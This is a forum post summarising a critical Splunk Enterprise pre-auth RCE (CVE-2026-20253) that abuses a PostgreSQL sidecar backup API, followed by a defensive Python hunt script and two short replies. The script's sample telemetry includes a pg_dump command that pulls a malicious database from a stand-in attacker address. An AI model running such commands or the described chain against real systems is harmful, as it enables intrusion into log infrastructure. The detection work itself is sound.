CVE-2026-20253: Splunk Pre-Auth RCE via PostgreSQL Sidecar (thecybersecguru.com)
from WPSteam@lemmy.world to cybersecurity@infosec.pub on 14 Jun 08:26
https://lemmy.world/post/48148395

CVE-2026-20253 is a critical Splunk Enterprise flaw in which the PostgreSQL sidecar's unauthenticated backup/restore API can be reached through Splunk Web. An attacker can abuse pg_dump/pg_restore to pull a malicious database from attacker infrastructure, restore attacker-controlled SQL locally, write files as the Splunk user, and eventually overwrite a scheduled Python script for remote code execution. This all highlights that Splunk Enterprise on AWS is especially exposed by default, that affected versions below 10.2.4 / 10.0.7 should be patched immediately, and that the impact is severe: compromising Splunk means compromising a system that often stores logs, auth events, firewall data, EDR telemetry, and other sensitive enterprise visibility data.

#cybersecurity
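The chain in the post has two observable stages on the host: the Splunk service account running pg_dump/pg_restore against a host that is not the local sidecar, and shortly afterwards a write to a Python script under the Splunk install. Below is an added example, not code from the linked write-up or from Splunk, of a small hunt that correlates those two stages over process and file telemetry, plus a version check against the fixed releases the post names. The service account name `splunk`, the install path `/opt/splunk/`, the event field names, the 30-minute window and the sample events are all assumptions constructed for illustration.

```python
"""Hunt for the CVE-2026-20253 chain as described in the post:
stage 1: pg_dump/pg_restore run as the Splunk user against a non-local host
stage 2: a .py file under the Splunk install written by the same user soon after.
Field names, paths, account name and sample telemetry are assumptions."""
import ipaddress
import shlex
from datetime import datetime, timedelta

SPLUNK_USER = "splunk"           # assumed service account
SPLUNK_HOME = "/opt/splunk/"     # assumed install path
WINDOW = timedelta(minutes=30)   # assumed correlation window
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Fixed releases per the post: 10.2.4 on the 10.2 branch, 10.0.7 on 10.0.
FIXED = {(10, 2): (10, 2, 4), (10, 0): (10, 0, 7)}


def is_affected(version):
    """True if below the fix on its branch, False if at/after it,
    None for a branch the post does not mention (check the vendor advisory)."""
    parts = tuple(int(p) for p in version.split("."))
    branch = parts[:2]
    if branch not in FIXED:
        return None
    return parts < FIXED[branch]


def pg_remote_host(cmdline):
    """Return the host a pg_dump/pg_restore command targets if it is not local.
    A sidecar backup should only ever talk to loopback or a unix socket, so any
    other host is the stage-1 signal. Connection strings passed via -d are not
    parsed here; extend as needed."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] not in ("pg_dump", "pg_restore"):
        return None
    host = None
    for i, a in enumerate(argv):
        if a in ("-h", "--host") and i + 1 < len(argv):
            host = argv[i + 1]
        elif a.startswith("--host="):
            host = a.split("=", 1)[1]
        elif a.startswith("-h") and len(a) > 2:
            host = a[2:]
    # No -h means libpq default (unix socket); a leading "/" is a socket dir.
    if host is None or host in LOCAL_HOSTS or host.startswith("/"):
        return None
    try:
        if ipaddress.ip_address(host).is_loopback:
            return None
    except ValueError:
        pass  # hostname rather than literal IP: treat as remote
    return host


def detect(events):
    """Correlate stage 1 and stage 2; return one alert per matching pair."""
    parse = datetime.fromisoformat
    stage1 = []
    for e in events:
        if e["type"] == "process" and e["user"] == SPLUNK_USER:
            host = pg_remote_host(e["cmdline"])
            if host:
                stage1.append((parse(e["ts"]), host, e["cmdline"]))
    alerts = []
    for e in events:
        if e["type"] != "file" or e["user"] != SPLUNK_USER:
            continue
        path = e["path"]
        if not (path.startswith(SPLUNK_HOME) and path.endswith(".py")):
            continue
        t = parse(e["ts"])
        for t1, host, cmd in stage1:
            if t1 <= t <= t1 + WINDOW:
                alerts.append({"ts": e["ts"], "remote_host": host,
                               "command": cmd, "script": path})
    return alerts


# Constructed sample telemetry (not real logs). 203.0.113.7 is a documentation
# address standing in for attacker infrastructure.
SAMPLE_EVENTS = [
    {"ts": "2026-06-10T09:00:00", "type": "process", "user": "splunk",
     "cmdline": "pg_dump -h localhost -U splunk kvstore"},            # routine local backup
    {"ts": "2026-06-10T09:05:00", "type": "process", "user": "splunk",
     "cmdline": "pg_dump -h 203.0.113.7 -p 5432 -U postgres -Fc -f /tmp/x.dump evil"},
    {"ts": "2026-06-10T09:06:00", "type": "process", "user": "splunk",
     "cmdline": "pg_restore -h 127.0.0.1 -d splunkdb /tmp/x.dump"},  # local restore: no host signal
    {"ts": "2026-06-10T09:12:00", "type": "file", "user": "splunk", "action": "write",
     "path": "/opt/splunk/etc/apps/search/bin/somejob.py"},          # scheduled script overwritten
    {"ts": "2026-06-10T15:00:00", "type": "file", "user": "splunk", "action": "write",
     "path": "/opt/splunk/var/log/splunk/splunkd.log"},             # normal log write
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

Run against the constructed events it raises a single alert pairing the pg_dump to 203.0.113.7 with the write to somejob.py seven minutes later; the local pg_restore and the log write produce nothing. The stage-1 check on its own is the cheaper signal to deploy first, since a sidecar backup that reaches out to anything other than loopback has no legitimate reason to exist.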


SeductiveTortoise@piefed.social on 14 Jun 13:36

Ouch. That sucks. And it sounds like a pretty dumb fuck-up.

SamuelEllis@lemmy.world on 21 Jun 11:04

The reliance on unauthenticated backup APIs for sidecar components fundamentally breaks the principle of least privilege, allowing lateral movement from a web-facing interface directly to the file system. This specific attack chain demonstrates how database utilities like pg_restore can be weaponized to escalate privileges and execute arbitrary code when integrated into a web application’s lifecycle without strict network segmentation or API authentication.